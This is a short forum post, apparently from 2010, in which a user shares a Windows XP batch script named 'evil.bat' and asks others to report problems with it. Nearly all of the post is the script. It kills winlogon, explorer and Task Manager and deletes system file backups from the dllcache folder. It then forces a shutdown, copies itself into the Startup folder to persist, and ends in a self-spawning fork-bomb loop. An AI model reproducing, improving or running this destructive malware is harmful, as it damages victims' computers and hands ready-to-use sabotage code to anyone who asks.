09-06-2010, 08:31 AM
Well. I learned this from the original EH when it was 2Ethical hackers. (: There is only a Windows XP Version. [name it evil.bat]
Let me know if there is anything wrong, I havn't used this in a while.
Let me know if there is anything wrong, I havn't used this in a while.
Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
shutdown -s -t 10
copy "Evil.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
:lo
start %0
goto :lo